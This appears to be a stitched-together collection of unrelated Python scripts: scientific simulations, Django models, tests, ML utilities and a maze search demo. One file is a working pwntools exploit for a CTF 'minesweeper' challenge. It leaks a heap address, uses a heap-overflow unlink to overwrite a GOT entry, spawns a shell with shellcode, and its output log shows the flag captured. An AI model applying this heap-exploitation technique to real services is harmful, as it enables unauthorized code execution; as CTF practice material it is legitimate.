posterior_out = ( ", ".join( str(e) for e in posterior ) )
f_out.write(theta_out)
f_out.write('\n')
f_out.write(posterior_out)
def plotkposterior(file):
theta,posterior = np.loadtxt(file, delimiter=",", unpack=False)
plt.figure()
plt.plot(theta,posterior)
plt.xlabel('Theta')
plt.ylabel('Posterior probability')
plt.title('Posterior probability for coin flip')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""测试基本类型"""
from typing import Any
import pytest
from smorest_sfs.extensions.marshal.bases import (
BaseIntListSchema,
BaseMsgSchema,
BasePageSchema,
)
class TestBasesMaClass:
def test_base_msg(self) -> None:
schema = BaseMsgSchema()
data = schema.dump({})
assert data["msg"] == "success" and data["code"] == 0
@pytest.mark.parametrize(
"data, result", [({"lst": []}, []), ({"lst": [1, 2, 3, 4]}, [1, 2, 3, 4]),],
)
def test_base_int_list(self, data: Any, result: Any) -> None:
schema = BaseIntListSchema()
rv = schema.load(data)
assert rv["lst"] == result
@pytest.mark.parametrize(
"data, result",
[
(
{
"meta": {
"page": 1,
"per_page": 10,
"total": 100,
"links": {
"next": "nurl",
"prev": "purl",
"first": "furl",
"last": "lurl",
},
}
},
{
"code": 0,
"meta": {
"page": 1,
"per_page": 10,
"total": 100,
"links": {
"next": "nurl",
"prev": "purl",
"first": "furl",
"last": "lurl",
},
},
"msg": "success",
},
)
],
)
def test_base_page(self, data: Any, result: Any) -> None:
schema = BasePageSchema()
rv = schema.dump(data)
assert rv == result
|
#!/usr/bin/env python
def test():
print 'This is a test.'
return
test()
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='i386', os='linux', terminal=['tmux', 'neww'])
if args['REMOTE']:
io = remote('pwn.chal.csaw.io', 7478)
elf, libc = ELF('./minesweeper'), None
else:
io = remote('localhost', 31337)
elf, libc = ELF('./minesweeper'), None
# initialize a board and then view it to leak an heap address
io.recvuntil('3) Q (Quit)\n')
io.sendline('I')
x = 4
y = 4
io.recvuntil(
'Please enter in the dimensions of the board you would like to set in this format: B X Y\n')
io.sendline('B {} {}'.format(x, y))
io.sendline('X' * (y * x))
io.recvuntil('3) Q (Quit)\n')
io.sendline('N')
io.recvuntil('3) Quit game (Q)\n')
io.sendline('V')
# print hexdump(io.recvall(timeout=1))
io.recvn(0x14)
an_heap_address = u32(io.recvn(0x4)) # 0x804c0f0
success('an_heap_address: %s' % hex(an_heap_address))
io.sendline('Q')
# initialize a board and overflow in the next heap chunk to trigger the classic unlink vulnerability
io.recvuntil('3) Q (Quit)\n')
io.sendline('I')
io.recvuntil(
'Please enter in the dimensions of the board you would like to set in this format: B X Y\n')
x = 20
y = 20
io.sendline('B {} {}'.format(x, y))
got_fwrite_address = 0x804bd64
shellcode_address = an_heap_address + (0x804c0fc - 0x804c0f0)
success('shellcode_address: %s' % hex(shellcode_address))
io.sendline(
fit({
0: asm(
'jmp $+0x6'
), # the shellcode starts here, but we need to skip the next bytes which are overwritten by unlink
4: 0xffffffff,
8: asm('push 0x4; pop ebp') +
asm(shellcraft.i386.linux.dupsh()), # the shellcode continues here
cyclic_find('taad'): p32(got_fwrite_address - 0x8),
cyclic_find('uaad'): p32(shellcode_address),
(y * x - 1): 'X'
}))
io.interactive()
# $ ./minesweeper.py REMOTE
# [+] Opening connection to pwn.chal.csaw.io on port 7478: Done
# [*] '/home/ubuntu/vbox/minesweeper'
# Arch: i386-32-little
# RELRO: No RELRO
# Stack: No canary found
# NX: NX disabled
# PIE: No PIE (0xc01000)
# RWX: Has RWX segments
# Packer: Packed with UPX
# [+] an_heap_address: 0x93740f0
# [+] shellcode_address: 0x93740fc
# . . .
# Please send the string used to initialize the board. Please send X * Y bytes follow by a newlineHave atleast 1 mine placed in your board, marked by the character X
# $ ls
# Makefile
# flag
# fork_accept.c
# malloc.c
# malloc.h
# minesweeper
# ms.c
# run.sh
# $ cat flag
# flag{h3aps4r3fun351eabf3}
|
'''
Testing Flexible Beam
'''
import sys
from scipy.integrate import odeint
from scipy.misc import derivative
from scipy import integrate
from scipy.optimize import root
from numpy.linalg import inv
import os
import pdb
from matplotlib import pyplot as plt
import numpy as np
from scipy import optimize
sys.path.append('/Users/Daniel/Github/Crawlab-Student-Code/Daniel Newman/Python Modules')
import InputShaping as shaping
import Generate_Plots as genplt
# ODE Solver characteristics
abserr = 1.0e-6
relerr = 1.0e-6
max_step = 0.01
folder = 'Figures/{}/'.format(
sys.argv[0],
)
if not os.path.exists(folder):
os.makedirs(folder)
def response(p, Shaper,K,Disturbance=None):
'''
Generate the response of a pendulum disturbed by a trolley
'''
# Unpack the constraints and initial conditions
tau_max, rho, I, E, L, StartTime, t_step, t, X0, Distance, m_p = p
#Determine the step at which the command is initiated
Start_step = np.round((StartTime / t_step)).astype(int)
# Initialize
input_vec = np.zeros([len(t),2])
theta1_d = Distance
response = np.zeros([len(t),len(X0)])
if isinstance(Shaper,np.ndarray):
in_shape = Shaper
elif Shaper == 'ZV':
in_shape1 = shaping.ZV_2mode(omega_11 / (2 * np.pi),0.0,omega_21/ (2 * np.pi),0.0).shaper
in_shape2 = shaping.ZV_2mode(omega_12 / (2 * np.pi),0.0,omega_22 / (2 * np.pi),0.0).shaper
in_shape = shaping.seqconv(in_shape1,in_shape2)
#print('Two Mode Shaper: {}'.format(in_shape))
K = K.T
else:
in_shape = np.array([[0.,1]])
p = [rho, in_shape, Distance, I, E, L, m_p]
# Generate the response
response = odeint(
eq_motion, X0, t, args=(t,p,K,tau_max,Disturbance),
atol=abserr, rtol=relerr, hmax=max_step,full_output=False
)
return in_shape,response
def eq_motion(X,t,t_sys,p,K_gains,max_effort,Disturbance):
'''
Return the state-space equations of motion for the two-link flexible manipulator.
'''
# Unpack all of the variables
rho, Shaper, Distance, I, E, l, m_p = p
# The X vector is of the form X, X_dot.
theta1,delta1,phi1,delta2,phi2,\
theta1_dot, delta1_dot, phi1_dot, delta2_dot, phi2_dot = X
variables = int(len(X)/2)
# Generate the reference angular trajectories based on the desired reference input and the input shaper
shaped_pos1 = shaping.shaped_input(shaping.step_input,t,Shaper,Distance[0])
shaped_vel1 = 0.
Dist = np.zeros(len(X))
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Put the equations of motion in the form:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# | Q_dot | | 0 | I | | Q |
# |----------| = |------------------------| * |-------| + B * u
# | Q_ddot | | M^(-1) * K | 0 | | Q_dot |
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
M = np.array([
[
l**3*rho/105,
13*l**2*rho/420,
-l**3*rho/140,
0,
0
],
[
13*l**2*rho/420,
26*l*rho/35,
0,
9*l*rho/70,
-13*l**2*rho/420
],
[
-l**3*rho/140,
0,
2*l**3*rho/105,
13*l**2*rho/420,
-l**3*rho/140
],
[
0,
9*l*rho/70,
13*l**2*rho/420,
13*l*rho/35 + m_p,
-11*l**2*rho/210
],
[
0,
-13*l**2*rho/420,
-l**3*rho/140,
-11*l**2*rho/210,
l**3*rho/105
]
])
K = np.array([
[0, 0, 0, 0, 0],
[0, 15*E*I/l**3, 9*E*I/l**2, -12*E*I/l**3, 6*E*I/l**2],
[0, 3*E*I/l**2, 7*E*I/l, -6*E*I/l**2, 2*E*I/l],
[0, -12*E*I/l**3, -6*E*I/l**2, 12*E*I/l**3, -6*E*I/l**2],
[0, 6*E*I/l**2, 2*E*I/l, -6*E*I/l**2, 4*E*I/l]
])
# Form the A matrix of the state-space equation
A_lower = np.concatenate((np.matmul(M,K),np.zeros_like(M)),axis=1)
A_upper = np.concatenate((np.zeros_like(M),np.eye(len(M[:,0]))),axis=1)
A = np.concatenate((A_upper,A_lower),axis=0)
# B is the input matrix, where the state variables are arranged by Q_ddot, Q_dot
# The first two variables are for the input torques tau1, tau2
# Each other input value should be zero
B = np.array([1,0,0,0,0]).T
# Reference desired states based on the shaped position and velocity.
X_ref = np.array([shaped_pos1,0,0,0,0,shaped_vel1,0,0,0,0]).T
# The control effort is given by multiplying the gain matrix by the desired reference states
u = np.matmul(K_gains.T,(X_ref - X))
X_dot = np.array([theta1_dot, delta1_dot, phi1_dot, delta2_dot, phi2_dot]).T
#print('Actuator Effort: {}'.format(u))
# If we are not optimizing, clip the actuator effort based on the maximum allowable.
# Otherwise, we want to see the "real" actuator effort without being clipped.
if optimize == False:
u = np.clip(u,-max_effort,max_effort)
ODE = [np.matmul(A[0,:],X) + Dist[0],
np.matmul(A[1,:],X) + Dist[1],
np.matmul(A[2,:],X) + Dist[2],
np.matmul(A[3,:],X) + Dist[3],
np.matmul(A[4,:],X) + Dist[4],
np.matmul(A[5,:],X) + u[0] + Dist[5],
np.matmul(A[6,:],X) + Dist[6],
np.matmul(A[7,:],X) + Dist[7],
np.matmul(A[8,:],X) + Dist[8],
np.matmul(A[9,:],X) + Dist[9],
]
pdb.set_trace()
return ODE
|
file = open('hipster_ipsum.txt')
def wordFreq ():
glutenFreeMentions = 0
coffeeMentions = 0
wokeMentions = 0
freqs = []
for word in file.read().split():
if word == str('coffee'):
coffeeMentions += 1
if word == str('Gluten-free'):
glutenFreeMentions += 1
if word == str('woke'):
wokeMentions += 1
freqs.append('coffee mentions= ' + str(coffeeMentions))
freqs.append('gluten-free mentions = ' +str(glutenFreeMentions))
freqs.append('woke mentions = ' +str(wokeMentions))
return freqs
print(wordFreq())
|
# python 2.7.3
import sys
import math
ans = [0] * 10
def f(s):
s = str(s)
r = 0
for c in s:
r += int(c)
return r
for i in range(1, 10):
if i % 2 == 0:
m = {}
for j in range(100):
m[j] = 0
for j in range(10 ** (i / 2)):
m[f(j)] += 1
cnt = 0
for k, v in m.iteritems():
cnt += v ** 2
ans[i] = cnt
else:
ans[i] = 10 * ans[i - 1]
# print ans
k = input()
print ans[k]
|
import shutil
from tqdm import tqdm_notebook as tqdm
import gzip
from youconfigme import AutoConfig
import pandas as pd
from pathlib import Path
import os
import requests
# taken from youconfigme's cast_utils
def ensure_path(path):
"""Create a path if it does not exist."""
path = Path(path)
path.mkdir(parents=True, exist_ok=True)
return path
def download_file(url, dest, override=False, chunksize=4096):
if os.path.exists(dest) and not override:
return
with requests.get(url, stream=True) as r:
try:
file_size = int(r.headers["Content-Length"])
except KeyError:
file_size = 0
chunks = file_size // chunksize
with open(dest, "wb") as f, tqdm(
total=file_size, unit="iB", unit_scale=True
) as t:
for chunkdata in r.iter_content(chunksize):
f.write(chunkdata)
t.update(len(chunkdata))
config = AutoConfig()
DATA_FOLDER = config.metadata_exitcom.data_folder(cast=ensure_path)
PREDICTIONS_FOLDER = config.metadata_exitcom.predictions_folder(cast=ensure_path)
DRIVE_DOWNLOAD_URL = "https://drive.google.com/uc?id={gid}&export=download".format
GSPREADHSEET_DOWNLOAD_URL = (
"https://docs.google.com/spreadsheets/d/{gid}/export?format=csv&id={gid}".format
)
TRAIN_CSV = DATA_FOLDER / "train.csv"
VALIDATION_CSV = DATA_FOLDER / "validate.csv"
TRAIN_URL = DRIVE_DOWNLOAD_URL(gid=config.metadata_exitcom.train_gid())
VALIDATION_URL = DRIVE_DOWNLOAD_URL(gid=config.metadata_exitcom.test_gid())
EXAMPLE_URL = DRIVE_DOWNLOAD_URL(gid=config.metadata_exitcom.example_gid())
EXAMPLE_CSV = PREDICTIONS_FOLDER / "example.csv"
def init_data():
# download data
data = {TRAIN_CSV: TRAIN_URL, VALIDATION_CSV: VALIDATION_URL}
for item_path, url in data.items():
download_file(url, item_path)
download_file(EXAMPLE_URL, EXAMPLE_CSV)
|
from tensorflow import keras
import numpy as np
import pandas as pd
import cv2
import random
from math import pi
import tensorflow as tf
# import os
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
train_samples = pd.read_csv('data/train.csv')
def rotate_images(X_imgs, start_angle, end_angle, n_images):
X_rotate = []
iterate_at = (end_angle - start_angle) / (n_images - 1)
tf.reset_default_graph()
X = tf.placeholder(tf.float32, shape=(128, 128, 3))
radian = tf.placeholder(tf.float32, shape=(len(X_imgs)))
tf_img = tf.contrib.image.rotate(X, radian)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for index in range(n_images):
degrees_angle = start_angle + index * iterate_at
radian_value = degrees_angle * pi / 180 # Convert to radian
radian_arr = [radian_value] * len(X_imgs)
rotated_imgs = sess.run(tf_img, feed_dict={X: X_imgs, radian: radian_arr})
X_rotate.append(rotated_imgs)
X_rotate = np.array(X_rotate, dtype=np.float32)
print(X_rotate.shape)
return X_rotate
def flip_images(X_imgs):
X_flip = []
tf.reset_default_graph()
X = tf.placeholder(tf.float32, shape=(128, 128, 3))
tf_img1 = tf.image.flip_left_right(X)
tf_img2 = tf.image.flip_up_down(X)
tf_img3 = tf.image.transpose_image(X)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
flipped_imgs = sess.run([tf_img1, tf_img2, tf_img3], feed_dict={X: X_imgs})
X_flip.append(flipped_imgs)
X_flip = np.array(X_flip, dtype=np.float32)
print(X_flip.shape)
return X_flip
def add_gaussian_noise(X_imgs):
gaussian_noise_imgs = []
row, col, _ = X_imgs[0].shape
mean = 0
var = 0.1
sigma = var ** 0.5
gaussian = np.random.random((row, col, 1)).astype(np.float32)
gaussian = np.concatenate((gaussian, gaussian, gaussian), axis=2)
gaussian_img = cv2.addWeighted(X_imgs, 0.75, 0.25 * gaussian, 0.25, mean)
gaussian_noise_imgs.append(gaussian_img)
gaussian_noise_imgs = np.array(gaussian_noise_imgs, dtype=np.float32)
print(gaussian_noise_imgs.shape)
return gaussian_noise_imgs
def create_training_data(dataset, root_dir, img_size, aug = False ):
'''
returns training data [image data, image label]
'''
training_data = []
for i in range(len(dataset)):
class_num = dataset['Category'][i]
if dataset['image_path'][i][-4] != '.':
img_path = root_dir + str(dataset['image_path'][i]) + ".jpg"
else:
img_path = root_dir + str(dataset['image_path'][i])
img_array = cv2.imread(img_path)
new_array = cv2.resize(img_array, (img_size, img_size))
if aug:
print("{}/{} - AUG".format(i, len(dataset)))
rotated_imgs = rotate_images(new_array, -90, 90, 14)
for j in range(len(rotated_imgs)):
training_data.append([rotated_imgs[j], class_num])
flipped_images = flip_images(new_array)
for k in range(len(flipped_images)):
training_data.append([flipped_images[k], class_num])
gaussian_noise_imgs = add_gaussian_noise(new_array)
for l in range(len(gaussian_noise_imgs )):
training_data.append([gaussian_noise_imgs[l], class_num])
else:
print("{}/{} - NORM".format(i, len(dataset)))
training_data.append([new_array, class_num])
random.shuffle(training_data)
X = []
y = []
for features, labels in training_data:
X.append(features)
y.append(labels)
X = np.array(X).reshape(-1, img_size, img_size, 3)
y = np.array(y)
return X, y
def select_data(dataset):
# to balance the train dataset
# find the max count of categories
# make the rest up to this max count
# this function calculates the number of data that needs augmentation in each category
# so that total number of pictures in each category = max count
max_count = 100
df_by_categories_aug= []
df_no_aug = []
for i in range(58):
df = dataset.loc[dataset['Category'] == i]
count = len(df)
if count >= max_count:
df = df.sample(frac=max_count/count).reset_index(drop=True)
df_no_aug.append(df)
else:
df_no_aug.append(df)
no_of_data_for_augmentation = (max_count - count) / 18
df_aug = df.sample(frac=no_of_data_for_augmentation / count, replace = True).reset_index(drop=True)
df_by_categories_aug.append(df_aug)
df_aug= pd.concat(df_by_categories_aug, ignore_index=True)
df_no_aug = pd.concat(df_by_categories_aug, ignore_index=True)
return df_aug, df_no_aug
selected_aug_data, no_aug_data = select_data(train_samples)
# to find number of pictures in each category
# train_samples = train_samples.groupby('Category').nunique()
# print(train_samples)
aug_train_images, aug_train_labels = create_training_data(selected_aug_data, 'data/', 128, aug=True)
normal_train_images, normal_train_labels = create_training_data(no_aug_data, 'data/', 128, aug=False)
train_images = np.concatenate((aug_train_images,normal_train_images))
train_labels = np.concatenate((aug_train_labels,normal_train_labels))
np.save("processed_data/augmented_images.npy", train_images)
np.save("processed_data/augmented_labels.npy", train_labels)
print(len())
# test_images, test_itemid = create_training_data(test_samples, 'data/', 128)
# np.save("processed_data/test_image_2.npy", test_images, allow_pickle=True)
# np.save("processed_data/test_itemid_2.npy", test_itemid, allow_pickle=True)
|
import uuid
from django.contrib.gis.db import models
from django.contrib.gis.geos import Point
class Hospital(models.Model):
hospital_uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.TextField()
address = models.TextField()
phone = models.TextField()
opening_hours = models.TextField()
lng = models.FloatField()
lat = models.FloatField()
location = models.PointField(geography=True, srid=4326, default='POINT(0.0 0.0)')
def __str__(self):
return str(self.hospital_uuid)
def save(self, **kwargs):
self.location = Point(float(self.lng), float(self.lat))
super(Hospital, self).save(**kwargs)
|
from maya import cmds as mc
from ..common import fk
class TongueComponent(fk):
def __init__(self, side, name, joints, parent, visibilityAttr):
self.visibilityAttr = visibilityAttr
super(TongueComponent, self).__init__(side, name, joints, parent)
def build(self, side, name, joints, parent):
super(TongueComponent, self).build(side, name, joints, parent)
for ctl in self.controls:
mc.rotate(0, 90, 0, ctl + ".cv[*]")
mc.scale(1, 1.5, 3.5, ctl + ".cv[*]")
mc.connectAttr(self.visibilityAttr, ctl + ".v")
|
# Generated by Django 2.0 on 2018-10-01 09:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mili', '0004_auto_20181001_0958'),
]
operations = [
migrations.AlterField(
model_name='registration',
name='roll',
field=models.CharField(max_length=5),
),
]
|
from typing import Callable, Optional
import torch
from torch import nn
class NonLinear(nn.Module):
def __init__(self,
in_features: int,
out_features: int,
activation: Optional[Callable] = None,
init_func: Optional[Callable] = None) -> None:
super(NonLinear, self).__init__()
self._linear = nn.Linear(in_features, out_features)
self._activation = activation
self.reset_parameters(init_func=init_func)
def reset_parameters(self, init_func: Optional[Callable] = None) -> None:
if init_func:
init_func(self._linear.weight)
def forward(self, x):
if self._activation:
return self._activation(self._linear(x))
return self._linear(x)
class BiLSTM(nn.Module):
def __init__(self,
input_size: int,
hidden_size: int,
num_layers: int = 1,
batch_first: bool = True,
dropout: float = 0,
init_func: Optional[Callable] = None) -> None:
super(BiLSTM, self).__init__()
self._lstm = nn.LSTM(input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
batch_first=True,
bidirectional=True,
dropout=dropout)
self.batch_first = batch_first
self.reset_parameters(init_func=init_func)
def reset_parameters(self, init_func: Optional[Callable] = None) -> None:
if init_func:
init_func(self._lstm.weight)
def forward(self, inputs: torch.Tensor, seq_lens: torch.Tensor):
seq_packed = torch.nn.utils.rnn.pack_padded_sequence(inputs, seq_lens, batch_first=self.batch_first)
lsmt_output, hidden = self._lstm(seq_packed) # lsmt_output: *, hidden_size * num_directions
# seq_unpacked: batch_size, seq_max_len in batch, hidden_size * num_directions
seq_unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(lsmt_output, batch_first=self.batch_first)
return seq_unpacked, hidden
class Biaffine(nn.Module):
def __init__(self,
in1_features: int,
in2_features: int,
out_features: int,
init_func: Optional[Callable] = None) -> None:
super(Biaffine, self).__init__()
self.in1_features = in1_features
self.in2_features = in2_features
self.out_features = out_features
self.linear_in_features = in1_features
self.linear_out_features = out_features * in2_features
# with bias default
self._linear = nn.Linear(in_features=self.linear_in_features,
out_features=self.linear_out_features)
self.reset_parameters(init_func=init_func)
def reset_parameters(self, init_func: Optional[Callable] = None) -> None:
if init_func:
init_func(self._linear.weight)
def forward(self, input1: torch.Tensor, input2: torch.Tensor):
batch_size, len1, dim1 = input1.size()
batch_size, len2, dim2 = input2.size()
affine = self._linear(input1)
affine = affine.view(batch_size, len1*self.out_features, dim2)
input2 = torch.transpose(input2, 1, 2)
biaffine = torch.transpose(torch.bmm(affine, input2), 1, 2)
biaffine = biaffine.contiguous().view(batch_size, len2, len1, self.out_features)
return biaffine
|
import re
import unicodedata
from django import template
register = template.Library()
CENSUS = {
'tanzania': '2012',
'kenya': '2009',
'nigeria': '2006',
'senegal': '2013',
'ethiopia': '2007',
'south africa': '2011',
}
LEVEL1_NAMES = {
'tanzania': 'Region',
'kenya': 'County',
'nigeria': 'State',
'senegal': 'Region',
'ethiopia': 'Region',
'south africa': 'Province'
}
@register.filter
def census_year(country):
return CENSUS.get(country.lower(), 'Unknown')
@register.filter
def geo_level(geo):
current_geo = geo.get('this')
if current_geo.get('geo_level') == 'level1':
try:
country_name = geo['parents']['country']['short_name']
return LEVEL1_NAMES.get(country_name.lower(), 'Level1')
except KeyError:
return 'Level1'
else:
return current_geo['geo_level'].title()
@register.filter
def underscore_slugify(value):
value = str(value)
value = re.sub(r'[^\w\s-]', '', value).strip().lower()
return re.sub(r'[-\s]+', '_', value)
|
from enum import Enum
from typing import List, NamedTuple, Callable, Optional
import random
from math import sqrt
from core.maze.generic_search import dfs, bfs, astar,node_to_path, Node
import time
import timeit
'''
Serão ilustrados os problemas de busca em profundidade e busca em largura em um labirinto
O Labirinto é bidimensional, em forma de uma caixa ou grade
'''
'''
Aqui a classe Cell é uma célula do labirinto.
A reprentação é feita por um enum de strings.
Vazio (“ “), bloqueado (“X”), início (“S”), chegada (“G”)
e caminho (“*”) são as opções, traduzidas do inglês.
'''
class Cell(str, Enum):
EMPTY = " "
BLOCKED = "X"
START = "S"
GOAL = "G"
PATH = "*"
'''
MazeLocation é uma classe que recebe uma tupla composta por
linha (row) e coluna (column), uma coordenada que
representa um lugar específico no labirinto gerado.
Representação de um local no labirinto
'''
class MazeLocation(NamedTuple):
row: int
column: int
#Aqui o labirinto é inicializado com (__init__), construtor
class Maze:
def __init__(
self,
rows: int = 10,
columns: int = 10,
sparseness: float = 0.2,
start: MazeLocation = MazeLocation(0, 0),
goal: MazeLocation = MazeLocation(9, 9),
) -> None:
# inicializa as variáveis de instância básicas
self._rows: int = rows
self._columns: int = columns
self.start: MazeLocation = start
self.goal: MazeLocation = goal
# preenche a grade ou caixa com cells o tipo 'EMPTY', vazias
self._grid: List[List[Cell]] = [
[Cell.EMPTY for c in range(columns)] for r in range(rows)
]
# preenche a grade ou caixa com cells o tipo 'BLOCKED'
self._randomly_fill(rows, columns, sparseness)
# preenche as posições inicial (START) e final (GOAL)
self._grid[start.row][start.column] = Cell.START
self._grid[goal.row][goal.column] = Cell.GOAL
'''tal função definirá quão espaço o labirinto será, através do parâmetro sparseness
o default é 20% das posições bloqueadas, se o número gerado por random for menor que 20%,
os espaços vazios serão preenchidos por células bloqueadas ou paredes
'''
def _randomly_fill(self, rows: int, columns: int, sparseness: float):
for row in range(rows):
for column in range(columns):
if random.uniform(0, 1.0) < sparseness:
self._grid[row][column] = Cell.BLOCKED
# devolve uma versão do labirinto formatado para exibiçao
def __str__(self) -> str:
output: str = ""
for row in self._grid:
output += "".join([c.value for c in row]) + "\n"
return output
'''
Recebe uma MazeLocation e returna um bool (comparando ml
com a chegada do labirinto gerado). Se ml for igual
a chegada, returna true, caso contrário, false.
Testa a chegada do labirinto
'''
def goal_test(self, ml: MazeLocation) -> bool:
return ml == self.goal
'''
Como se mover no labirinto?
A função successors ficará responsável por isso
No código, uma lista de MazeLocation é criada, denominada locations.
Ela guardará as posições percorridas no labirinto.
A ordem é ml.row + 1, ml.row -1, ml.column +1, ml.column -1 ou
acima, abaixo, direita, esquerda, respectivamente.
Se a célula for diferente de Cell.Blocked, caminha para a
posição em questão, caso contrário, passa para a próxima.
As MazeLocation fora da caixa do labirinto não são verificadas
Uma lista com todas as localidades possíveis é construída e retornada (locations)
'''
def successors(self, ml: MazeLocation) -> List[MazeLocation]:
locations: List[MazeLocation] = []
if (
ml.row + 1 < self._rows
and self._grid[ml.row + 1][ml.column] != Cell.BLOCKED
):
locations.append(MazeLocation(ml.row + 1, ml.column))
if ml.row - 1 >= 0 and self._grid[ml.row - 1][ml.column] != Cell.BLOCKED:
locations.append(MazeLocation(ml.row - 1, ml.column))
if (
ml.column + 1 < self._columns
and self._grid[ml.row][ml.column + 1] != Cell.BLOCKED
):
locations.append(MazeLocation(ml.row, ml.column + 1))
if ml.column - 1 >= 0 and self._grid[ml.row][ml.column - 1] != Cell.BLOCKED:
locations.append(MazeLocation(ml.row, ml.column - 1))
return locations
'''
Na função mark:
para exibição, será marcado o caminho percorrido ("PATH") na lista devolvida (pilha)
será marcada a linha e coluna que representa o início (start) (estado inicial)
e a linha e coluna que representa a chegada (goal) (estado final)
'''
def mark(self, path: List[MazeLocation]):
for maze_location in path:
self._grid[maze_location.row][maze_location.column] = Cell.PATH
self._grid[self.start.row][self.start.column] = Cell.START
self._grid[self.goal.row][self.goal.column] = Cell.GOAL
'''
A função clear remove o caminho percorrido, permitindo testar um algoritmo de
busca diferente no mesmo labirinto gerado
'''
def clear(self, path: List[MazeLocation]):
for maze_location in path:
self._grid[maze_location.row][maze_location.column] = Cell.EMPTY
self._grid[self.start.row][self.start.column] = Cell.START
self._grid[self.goal.row][self.goal.column] = Cell.GOAL
def manhattan_distance(goal: MazeLocation) -> Callable[[MazeLocation], float]:
def distance(ml: MazeLocation) -> float:
print(ml)
xdist: int = abs(ml.column - goal.column)
ydist: int = abs(ml.row - goal.row)
#print("Resultado--------------")
#print("Coluna: "+ str(xdist))
#print("Linha: " + str(ydist))
#print("##########################")
#print(xdist + ydist)
return (xdist + ydist)
return distance
'''if __name__ == "__main__":
# gera labirinto e escreve
m: Maze = Maze()
print("LABIRINTO GERADO")
print(m)
# test DFS
inicio = timeit.default_timer()
solution1: Optional[Node[MazeLocation]] = dfs(m.start, m.goal_test, m.successors)
fim = timeit.default_timer()
if solution1 is None:
print("Sem solução para a depth-first search!")
else:
path1: List[MazeLocation] = node_to_path(solution1)
m.mark(path1)
print("SOLUÇÃO COM DFS")
print(m)
m.clear(path1)
print('tempo de execução da DFS: %f' % (fim - inicio))
# test BFS
inicio = timeit.default_timer()
solution2: Optional[Node[MazeLocation]] = bfs(m.start, m.goal_test, m.successors)
fim = timeit.default_timer()
if solution2 is None:
print("Sem solução para a breadth-first search!")
else:
path2: List[MazeLocation] = node_to_path(solution2)
m.mark(path2)
print("SOLUÇÃO COM BFS")
print(m)
m.clear(path2)
print('tempo de execução da BFS: %f' % (fim - inicio))
'''
def runWeb():
#Um dicionario que armazena tudo que vai para a página web
labirintoDados = {}
# gera labirinto e escreve
m: Maze = Maze()
labirintoDados['original'] = percorreAlgoritimo(m)
# test DFS
inicio = timeit.default_timer()
solution1: Optional[Node[MazeLocation]] = dfs(m.start, m.goal_test, m.successors)
#print(dir(solution1.state))
fim = timeit.default_timer()
if solution1 is None:
labirintoDados['dfs'] = None
#print("Sem solução para a depth-first search!")
else:
path1: List[MazeLocation] = node_to_path(solution1)
m.mark(path1)
#print("SOLUÇÃO COM DFS")
#print(m)
labirintoDados['dfs'] = percorreAlgoritimo(m)
labirintoDados['dfs_temp'] = fim - inicio
m.clear(path1)
#m.clear(path_teste)
#print('tempo de execução da DFS: %f' % (fim - inicio))
# test BFS
inicio = timeit.default_timer()
solution2: Optional[Node[MazeLocation]] = bfs(m.start, m.goal_test, m.successors)
fim = timeit.default_timer()
if solution2 is None:
labirintoDados['bfs'] = None
#print("Sem solução para a breadth-first search!")
else:
path2: List[MazeLocation] = node_to_path(solution2)
m.mark(path2)
#print("SOLUÇÃO COM BFS")
#print(m)
labirintoDados['bfs'] = percorreAlgoritimo(m)
labirintoDados['bfs_temp'] = fim - inicio
m.clear(path2)
#print('tempo de execução da BFS: %f' % (fim - inicio))
distance: Callable[[MazeLocation], float] = manhattan_distance(m.goal)
inicio = timeit.default_timer()
solution3: Optional[Node[MazeLocation]] = astar(m.start, m.goal_test, m.successors, distance)
fim = timeit.default_timer()
if solution3 is None:
labirintoDados['astar'] = None
#print("Sem solução para a breadth-first search!")
else:
path3: List[MazeLocation] = node_to_path(solution3)
m.mark(path3)
#print("SOLUÇÃO COM BFS")
#print(m)
labirintoDados['astar'] = percorreAlgoritimo(m)
labirintoDados['astar_temp'] = fim - inicio
m.clear(path3)
#print('tempo de execução da BFS: %f' % (fim - inicio))
return labirintoDados
#Percorre todo o algoritimo para criar uma cópia da matriz do labirinto
def percorreAlgoritimo(m):
lista = []
for te in m._grid:
lis = []
for t in te:
if t[0]== " ":
lis.append(" ")
if t[0]== "X":
lis.append("X")
if t[0]== "S":
lis.append("S")
if t[0]== "G":
lis.append("G")
if t[0]== "*":
lis.append("*")
lista.append(lis)
return lista
|
from django.db import models
from django_countries.fields import CountryField
class StudentModel(models.Model):
name = models.CharField(max_length=50)
age = models.IntegerField()
gender = models.CharField(max_length=50)
#skills = models.ManyToManyField()
country = CountryField()
remarks = models.CharField(max_length=1000)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
isactive = models.BooleanField(default=False)
def __str__(self):
return self.name |
from __future__ import print_function, absolute_import, division
import KratosMultiphysics as Kratos
import KratosMultiphysics.RANSApplication as KratosRANS
from KratosMultiphysics.RANSApplication.adjoint_turbulence_eddy_viscosity_model_configuration import AdjointTurbulenceEddyViscosityModelConfiguration
class AdjointTurbulenceKEpsilonConfiguration(
AdjointTurbulenceEddyViscosityModelConfiguration):
def __init__(self, model, parameters):
super(AdjointTurbulenceKEpsilonConfiguration, self).__init__(
model, parameters)
